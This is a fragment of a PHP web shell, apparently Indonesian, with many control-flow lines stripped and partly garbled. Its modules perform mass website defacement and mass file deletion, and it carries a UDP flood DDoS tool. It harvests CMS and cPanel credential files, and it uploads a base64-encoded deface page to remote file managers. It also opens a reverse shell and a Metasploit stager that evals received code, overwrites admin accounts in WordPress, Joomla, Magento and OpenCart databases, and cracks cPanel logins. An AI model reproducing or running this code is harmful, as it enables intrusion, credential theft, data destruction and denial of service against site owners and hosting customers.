" .exe
}
} elseif($_GET['do'] == 'mass_deface') {
function sabun_massal
if
$dira = scandir($dir);
foreach
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if
file_put_contents
} elseif($dirb === '..') {
file_put_contents
} else {
if
if
echo "[DONE] $lokasi
"
file_put_contents
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function sabun_biasa
if
$dira = scandir($dir);
foreach
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if
file_put_contents
} elseif($dirb === '..') {
file_put_contents
} else {
if
if
echo "[DONE] $dirb/$namafile
"
file_put_contents
}
}
}
}
}
}
if
if
echo "
"
sabun_massal
echo "
"
} elseif($_POST['tipe_sabun'] == 'murah') {
echo "
"
sabun_biasa
echo "
"
}
} else {
echo ""
echo
Tipe Sabun:

BiasaMassal

Folder:



Filename:



Index File:

Hacked by Global Network


";
}
} elseif($_GET['do'] == 'ddos') {
?>






Your IP

Ddos Tool
IP Target
:


Time
:


Port
:








Seteleh selesai menggunakan tools ini segera refresh browsingmu




"
$max_time = $time + $exec_time;
for
$out.= "X";
}
while
$packets++;
if
break
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if
fwrite
fclose
}
}
echo "Packet complete at " .
";
}
} elseif($_GET['do'] == 'mass_delete') {
function hapus_massal
if
$dira = scandir($dir);
foreach
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if
if
unlink
}
} elseif($dirb === '..') {
if
unlink
}
} else {
if
if
if
echo "[DELETED] $lokasi
"
unlink
$idx = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if
echo "
"
hapus_massal
echo "
"
} else {
echo ""
echo
Folder:



Filename:




";
}
} elseif($_GET['do'] == 'config') {
$etc = fopen("/etc/passwd", "r") or die("
Can't read /etc/passwd
");
$idx = mkdir("idx_config", 0777);
$isi_htc = "Options all Require None Satisfy Any";
$htc = fopen("idx_config/.htaccess","w");
fwrite
while
if
echo "Can't read /etc/passwd"
} else {
preg_match_all
foreach
$user_config_dir = "/home/$user_idx/public_html/";
if
$grab_config = array(
"/home/$user_idx/.my.cnf" => "cpanel",
"/home/$user_idx/.accesshash" => "WHM-accesshash",
"/home/$user_idx/public_html/po-content/config.php" => "Popoji",
"/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
"/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
"/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
"/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
"/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/forum/config.php" => "phpBB",
"/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
"/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
"/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
"/home/$user_idx/public_html/configuration.php" => "Joomla",
"/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/admin/config.php" => "OpenCart",
"/home/$user_idx/public_html/slconfig.php" => "Sitelok",
"/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
foreach
$ambil_config = file_get_contents($config);
if
} else {
$file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
fputs
}
}
}
}
}
}
echo "Done"
} elseif($_GET['do'] == 'jumping') {
$i = 0;
echo "
"
if
$urls = explode(" ", $_POST['url']);
if
echo "
"
foreach
$url = str_replace(array("http://","www."), "", strtolower($url));
$etc = "/etc/passwd";
$f = fopen($etc,"r");
while
$pecah = explode(":", $gets);
$user = $pecah[0];
$dir_user = "/hsphere/local/home/$user";
if
$url_user = $dir_user."/".$url;
if
$i++;
$jrw = "[R] $url_user";
if
$jrw = "[RW] $url_user";
}
echo
}
}
}
}
if
} else {
echo "
Total ada " .
}
echo "
"
} else {
echo

List Domains
';
$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
while
echo
}
echo
<input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
</form></center>';
}
} elseif(preg_match("/vhosts/", $dir)) {
$urls = explode(" ", $_POST['url']);
if
echo "<pre>"
foreach
$web_vh = "/var/www/vhosts/$url/httpdocs";
if
if
$i++;
$jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
if
$jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
}
echo
}
}
}
if
} else {
echo "<br>Total ada " .
}
echo "</pre>"
} else {
echo
<form method="post">
List Domains
<textarea name="url" style="width: 500px; height: 250px;">';
bing
echo
<input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
</form></center>';
}
} else {
echo "<pre>"
$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
while
if
echo "<font color=red>Can't read /etc/passwd</font>"
} else {
preg_match_all
foreach
$user_jumping_dir = "/home/$user_idx_jump/public_html";
if
$i++;
$jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
if
$jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
}
echo
if
$domain_jump = file_get_contents("/etc/named.conf");
if
echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"
} else {
preg_match_all
foreach
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if
echo " => ( <u>$dj</u> )<br>"
break
}
}
}
} else {
echo "<br>"
}
}
}
}
}
if
} else {
echo "<br>Total ada " .
}
echo "</pre>"
}
echo "</div>"
} elseif($_GET['do'] == 'autoklik') {
?>
<form method="post">
<input type="submit" name="x" value="index.php">
</form>
<?php
$target = explode(" ", $_POST['target']);
if
foreach
$global = "index.php";
$isi_nama_doang = "PGVtYmVkDQpzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9qX3kzaTNFSFI3RSZhbXA7YXV0b3BsYXk9MSZhbXA7bG9vcD0xJmFtcDtwbGF5bGlzdD1iZXNORFB2RXdRdyINCnR5cGU9ImFwcGxpY2F0aW9uL3gtc2hvY2t3YXZlLWZsYXNoIiB3bW9kZT0idHJhbnNwYXJlbnQiIGhlaWdodD0iMSINCndpZHRoPSIxIj48L2VtYmVkPiANCjxib2R5IGJnY29sb3I9J2JsYWNrJz4NCgk8Zm9udCBjb2xvcj0icmVkIj4JDQoJPGNlbnRlcj48YnI+PGJyPjxpbWcgc3JjPSdodHRwOi8vaS5pbWd1ci5jb20vM203bGVDdy5qcGcnPg0KCTxicj5CZWxhamFyIG1lbmdhbGFoIHNhbXBhaSB0YWsgc2F0dXB1biB5YW5nIGRhcGF0IG1lbmdhbGFoa2FuLg0KCTxicj4gS2VlcCBQbGF5IFdpdGggeW91IGdhbWUgYW5kIGtlZXAgRnVuIDpEDQoJPGJyPnRpZGFrIGFkYSBvcmFuZyBib2RvaCBhdGF1IG9yYW5nIGphZ28geWFuZyBhZGEgaGFueWEga2F0YSBtYWxlcy4NCgk8YnI+Sml3YSBTZW9yYW5nIGRlZmFjZXIgdGV0YXBsYWggc2FtYSA6RCA8L2ZvbnQ+DQoJPGJyPjxicj48Zm9udCBzaXplPSI1IiBjb2xvcj0iIzAwZmYwMCI+VGFua3MgdG86PC9mb250PjwvY2VudGVyPjxjZW50ZXI+DQo8bWFycXVlZSBkaXJlY3Rpb249InVwIiBzY3JvbGxhbW91bnQ9IjIiIGJnY29sb3I9IiIgd2lkdGg9IjI1MCIgaGVpZ2h0PSI0MCI+PGNlbnRlcj4NCjxwPjxiPjxmb250IHNpemU9IjMiIGNvbG9yPSIjMDBmZjAwIj49WyBUZW1hbi1UZW1hbmt1IF09PGJyPjxicj5HYWJieTxicj5BbnRvbmlvIEhTSDxicj5SMTA8YnI+dzRyMHg8YnI+ZWRlbGxlMDA3PGJyPkJyaWFuIGthbWlrYXplPGJyPkNsb3ZlciBMZXBleDxicj4NClV5YXA8YnI+WmluYmFkPGJyPkZIMDRaQTxicj5TYW5pIG1hcnBpYzxicj4NCk1hZGFuIEN5YmVyPGJyPkNhaCBCYWd1czxicj5SUEc8YnI+VmFsbGVudDxicj5QNG5qaWVfYS5rLmE8YnI+RHdpIFN5bnRpYTxicj7GcnVsIFJpbmdnbydzPGJyPlRpJ2FyIFZhcmlhYmVsPGJyPkltZWk3PGJyPkhtZWk3PGJyPkRlIFZpbmNsb3VzPGJyPkJsYW5rb24zMzxicj5Eb3phIENyYWNrZXI8YnI+WWluZyBDcmFja2VyPGJyPklyYW5pYW4gSGFja2VyPGJyPkRhbmdlciBIYWNrZXI8YnI+QWRtaW4wNzxicj5aaG91IHlvdTxicj5Lc2F0cmlhLnVzPGJyPkN5YmVyIEluajNjdGkwbjxicj5LMmxsMzNkPGJyPlN1bHRhbiBIYWlrYWw8YnI+U3ludGF4X0Vycm9yPGJyPkFxaXM8YnI+QmxhY2sgU2hhZG93PGJyPmNyYWNrOTk5PGJyPkZuYXRpYyBDcmV3PGJyPg0KQ29yZXRhbiBSaXphbDxicj5NYWxhaWthdCBNYXV0PGJyPkRhbiB0ZW1hbi10ZW1hbiBrdSBzZW11YTxicj48YnI+PVsgZ3J1cCBoYWNraW5nIF09PGJyPjxicj5CbGFjayBOZXdiaWUgVGVhbTxicj4zeHBpcmUgQ3liZXIgQXJteTxicj5IYWNrIEZvcnVtPGJyPg0KSW5kb25lc2lhIEZpZ2h0ZXIgQ3liZXI8YnI+QmlhbmcgS2Vyb3ggVGVhbTxicj5Bbm9ueW1vdXM8YnI+R2F6YSBIYWNrZXI8YnI+QWxiYW5pYW4gSGFja2VyPGJyPkRldmlseiBjMGRlPGJyPk11c2xpbXMgQ3liZXIgU2hlbGx6PGJyPlgtQ29kZTxicj5JbmRvWHBsb2l0PGJyPkluZG9uZXNpYW4gU2VjdXJpdHk8YnI+SW5kb25lc2lhIEJsYWNrIEN5YmVyPGJyPg0KQi1Db21waTxicj5KYXNha29tPGJyPk1vam9wYWhpdCBGaWdodGVyIEN5YmVyPGJyPkxhcHBpczxicj5Nb2pvcGFoaXQgQ3liZXIgRGFyazxicj5DcmFjayBIYWNrIEZvcnVtPGJyPmRhbiBzZW11YSBncnVwIGhhY2tpbmc8YnI+eWFuZzxicj5zYXlhIG5hdW5naSBkYW4gc2luZ2dhaGk8YnI+PGJyPjxicj5CeTxicj5Kb25hdGhhbiBNaWxlczxicj48YnI+PGJyPg0KPC9mb250PjwvYj48L3A+DQo8L2NlbnRlcj4NCjwvbWFycXVlZT4=";
$decode_isi = base64_decode($isi_nama_doang);
$encode = base64_encode($global);
$ss = fopen($global,"w");
fputs
echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>"
echo "Done index.php<br>"
$url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw";
$post1 = array(
"target" => "l1_$encode",
"content" => "$decode_isi",);
$post2 = array( "upload[]" => "@$global",);
$output_mkfile = ngirim("$korban", $post1);
$upload_ah = ngirim("$korban?cmd=upload", $post2);
}
}
?>
<form method="post">
<input type="submit" name="s" value="lol.php">
</form>
<?php
$targets = explode(" ", $_POST['targets']);
if
foreach
$globa = "lol.php";
$isi_nama = "PGVtYmVkDQpzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9qX3kzaTNFSFI3RSZhbXA7YXV0b3BsYXk9MSZhbXA7bG9vcD0xJmFtcDtwbGF5bGlzdD1iZXNORFB2RXdRdyINCnR5cGU9ImFwcGxpY2F0aW9uL3gtc2hvY2t3YXZlLWZsYXNoIiB3bW9kZT0idHJhbnNwYXJlbnQiIGhlaWdodD0iMSINCndpZHRoPSIxIj48L2VtYmVkPiANCjxib2R5IGJnY29sb3I9J2JsYWNrJz4NCgk8Zm9udCBjb2xvcj0icmVkIj4JDQoJPGNlbnRlcj48YnI+PGJyPjxpbWcgc3JjPSdodHRwOi8vaS5pbWd1ci5jb20vM203bGVDdy5qcGcnPg0KCTxicj5CZWxhamFyIG1lbmdhbGFoIHNhbXBhaSB0YWsgc2F0dXB1biB5YW5nIGRhcGF0IG1lbmdhbGFoa2FuLg0KCTxicj4gS2VlcCBQbGF5IFdpdGggeW91IGdhbWUgYW5kIGtlZXAgRnVuIDpEDQoJPGJyPnRpZGFrIGFkYSBvcmFuZyBib2RvaCBhdGF1IG9yYW5nIGphZ28geWFuZyBhZGEgaGFueWEga2F0YSBtYWxlcy4NCgk8YnI+Sml3YSBTZW9yYW5nIGRlZmFjZXIgdGV0YXBsYWggc2FtYSA6RCA8L2ZvbnQ+DQoJPGJyPjxicj48Zm9udCBzaXplPSI1IiBjb2xvcj0iIzAwZmYwMCI+VGFua3MgdG86PC9mb250PjwvY2VudGVyPjxjZW50ZXI+DQo8bWFycXVlZSBkaXJlY3Rpb249InVwIiBzY3JvbGxhbW91bnQ9IjIiIGJnY29sb3I9IiIgd2lkdGg9IjI1MCIgaGVpZ2h0PSI0MCI+PGNlbnRlcj4NCjxwPjxiPjxmb250IHNpemU9IjMiIGNvbG9yPSIjMDBmZjAwIj49WyBUZW1hbi1UZW1hbmt1IF09PGJyPjxicj5HYWJieTxicj5BbnRvbmlvIEhTSDxicj5SMTA8YnI+dzRyMHg8YnI+ZWRlbGxlMDA3PGJyPkJyaWFuIGthbWlrYXplPGJyPkNsb3ZlciBMZXBleDxicj4NClV5YXA8YnI+WmluYmFkPGJyPkZIMDRaQTxicj5TYW5pIG1hcnBpYzxicj4NCk1hZGFuIEN5YmVyPGJyPkNhaCBCYWd1czxicj5SUEc8YnI+VmFsbGVudDxicj5QNG5qaWVfYS5rLmE8YnI+RHdpIFN5bnRpYTxicj7GcnVsIFJpbmdnbydzPGJyPlRpJ2FyIFZhcmlhYmVsPGJyPkltZWk3PGJyPkhtZWk3PGJyPkRlIFZpbmNsb3VzPGJyPkJsYW5rb24zMzxicj5Eb3phIENyYWNrZXI8YnI+WWluZyBDcmFja2VyPGJyPklyYW5pYW4gSGFja2VyPGJyPkRhbmdlciBIYWNrZXI8YnI+QWRtaW4wNzxicj5aaG91IHlvdTxicj5Lc2F0cmlhLnVzPGJyPkN5YmVyIEluajNjdGkwbjxicj5LMmxsMzNkPGJyPlN1bHRhbiBIYWlrYWw8YnI+U3ludGF4X0Vycm9yPGJyPkFxaXM8YnI+QmxhY2sgU2hhZG93PGJyPmNyYWNrOTk5PGJyPkZuYXRpYyBDcmV3PGJyPg0KQ29yZXRhbiBSaXphbDxicj5NYWxhaWthdCBNYXV0PGJyPkRhbiB0ZW1hbi10ZW1hbiBrdSBzZW11YTxicj48YnI+PVsgZ3J1cCBoYWNraW5nIF09PGJyPjxicj5CbGFjayBOZXdiaWUgVGVhbTxicj4zeHBpcmUgQ3liZXIgQXJteTxicj5IYWNrIEZvcnVtPGJyPg0KSW5kb25lc2lhIEZpZ2h0ZXIgQ3liZXI8YnI+QmlhbmcgS2Vyb3ggVGVhbTxicj5Bbm9ueW1vdXM8YnI+R2F6YSBIYWNrZXI8YnI+QWxiYW5pYW4gSGFja2VyPGJyPkRldmlseiBjMGRlPGJyPk11c2xpbXMgQ3liZXIgU2hlbGx6PGJyPlgtQ29kZTxicj5JbmRvWHBsb2l0PGJyPkluZG9uZXNpYW4gU2VjdXJpdHk8YnI+SW5kb25lc2lhIEJsYWNrIEN5YmVyPGJyPg0KQi1Db21waTxicj5KYXNha29tPGJyPk1vam9wYWhpdCBGaWdodGVyIEN5YmVyPGJyPkxhcHBpczxicj5Nb2pvcGFoaXQgQ3liZXIgRGFyazxicj5DcmFjayBIYWNrIEZvcnVtPGJyPmRhbiBzZW11YSBncnVwIGhhY2tpbmc8YnI+eWFuZzxicj5zYXlhIG5hdW5naSBkYW4gc2luZ2dhaGk8YnI+PGJyPjxicj5CeTxicj5Kb25hdGhhbiBNaWxlczxicj48YnI+PGJyPg0KPC9mb250PjwvYj48L3A+DQo8L2NlbnRlcj4NCjwvbWFycXVlZT4=";
$decode_isi = base64_decode($isi_nama);
$encode = base64_encode($globa);
$ss = fopen($globa,"w");
fputs
echo "[+] <a href='$korban' targets='_blank'>$korba</a> <br>"
echo "Done lol.php<br>"
$url_mkfil = "$korba?cmd=mkfile&name=$globa&targets=l1_Lw";
$post1 = array(
"targets" => "l1_$encode",
"content" => "$decode_isi",);
$post2 = array( "upload[]" => "@$globa",);
$output_mkfil = ngirim("$korban", $post1);
$upload_as = ngirim("$korban?cmd=upload", $post2);
}
}
} elseif($_GET['do'] == 'tool') {
error_reporting
function ss
$s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td><td><hr color='#4C83AF'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />";
echo
if ($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}
if
if
if
if
umask
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if
stream_set_blocking
stream_set_blocking
stream_set_blocking
stream_set_blocking
while
if
if
if
} elseif($_GET['do'] == 'auto_edit_user') {
if
if
echo "username atau password harus lebih dari 6 karakter"
} else {
$user_baru = $_POST['user_baru'];
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach
if
$config = file_get_contents("$conf/$file_conf");
if
$dbhost = ambilkata($config,"host = '","'");
$dbuser = ambilkata($config,"user = '","'");
$dbpass = ambilkata($config,"password = '","'");
$dbname = ambilkata($config,"db = '","'");
$dbprefix = ambilkata($config,"dbprefix = '","'");
$prefix = $dbprefix."users";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = ambilkata($config,"sitename = '","'");
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
echo "Config => " .
echo "CMS => Joomla<br>"
if
echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>"
} else {
echo "Sitename => $site<br>"
}
if
echo "Status => <font color=red>" .mysql_error
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"
}
mysql_close
} elseif(preg_match("/WordPress/",$config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
echo "Config => " .
echo "CMS => Wordpress<br>"
echo
if
echo "Status => <font color=red>" .mysql_error
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"
}
mysql_close
} elseif(preg_match("/Magento|Mage_Core/",$config)) {
$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
$dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
$dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
$dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
$dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
$prefix = $dbprefix."admin_user";
$option = $dbprefix."core_config_data";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
$result2 = mysql_fetch_array($q2);
$target = $result2[value];
if
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => " .
echo "CMS => Magento<br>"
echo
if
echo "Status => <font color=red>" .mysql_error
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"
}
mysql_close
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
$dbuser = ambilkata($config,"'DB_USERNAME', '","'");
$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
$dbname = ambilkata($config,"'DB_DATABASE', '","'");
$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
$prefix = $dbprefix."user";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$target = ambilkata($config,"HTTP_SERVER', '","'");
if
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => " .
echo "CMS => OpenCart<br>"
echo
if
echo "Status => <font color=red>" .mysql_error
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"
}
mysql_close
} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
$dbhost = ambilkata($config,'server = "','"');
$dbuser = ambilkata($config,'username = "','"');
$dbpass = ambilkata($config,'password = "','"');
$dbname = ambilkata($config,'database = "','"');
$prefix = "users";
$option = "identitas";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
$result = mysql_fetch_array($q);
$target = $result[alamat_website];
if
$target2 = $result[url];
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
if
$url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$cek_login3 = file_get_contents("$target2/adminweb/");
$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
if
$url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
$url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
} else {
$url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
}
}
} else {
$cek_login = file_get_contents("$target/adminweb/");
$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
if
$url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
$url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
} else {
$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
}
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
echo "Config => " .
echo "CMS => Lokomedia<br>"
if
echo
} else {
echo
}
if
echo "Status => <font color=red>" .mysql_error
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"
}
mysql_close
}
}
}
} else {
echo
<h1>Auto Edit User Config</h1>
<form method='post'>
DIR Config
<input type='text' size='50' name='config_dir' value='$dir'><br><br>
Set User
<input type='text' name='user_baru' value='global' placeholder='user_baru'><br>
<input type='text' name='pass_baru' value='global' placeholder='pass_baru'><br>
<input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
</form>
<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
";
}
} elseif($_GET['do'] == 'cpanel') {
if
$usercp = explode(" ", $_POST['user_cp']);
$passcp = explode(" ", $_POST['pass_cp']);
$i = 0;
foreach
foreach
if
if
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if
} else {
$i++;
if
$domain_cp = file_get_contents("/etc/named.conf");
if
$dom = "<font color=red>gabisa ambil nama domain nya</font>";
} else {
preg_match_all
foreach
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_cp_url = $user_cp_url['name'];
if
$dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
break
}
}
}
} else {
$dom = "<font color=red>function is Disable by system</font>";
}
echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>"
}
}
}
}
}
if
} else {
echo "<br>sukses nyolong " .
}
} else {
echo
<form method='post'>
user
<textarea style='width: 450px; height: 150px;' name='user_cp'>";
$_usercp = fopen("/etc/passwd","r");
while
if
echo "<font color=red>Can't read /etc/passwd</font>"
} else {
preg_match_all
foreach
if
echo
}
}
}
}
echo
PASS
<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
function cp_pass
$pass = "";
$dira = scandir($dir);
foreach
if
$ambil = file_get_contents("$dir/$dirb");
if
$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")." ";
} elseif(preg_match("/JConfig|joomla/", $ambil)) {
$pass .= ambilkata($ambil,"password = '","'")." ";
} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")." ";
} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
$pass .= ambilkata($ambil,'password = "','"')." ";
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")." ";
} elseif(preg_match("/^[client]$/", $ambil)) {
preg_match
if
$pass1[1] = str_replace('"', "", $pass1[1]);
$pass .= $pass1[1]." ";
} else {
$pass .= $pass1[1]." ";
}
} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
$pass .= ambilkata($ambil,"db_password = '","'")." ";
}
}
echo
}
$cp_pass = cp_pass($dir);
echo
echo
<input type='submit' name='crack' style='width: 450px;' value='Crack'>
</form>
<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
}
} elseif($_GET['do'] == 'cpftp_auto') {
if
$usercp = explode(" ", $_POST['user_cp']);
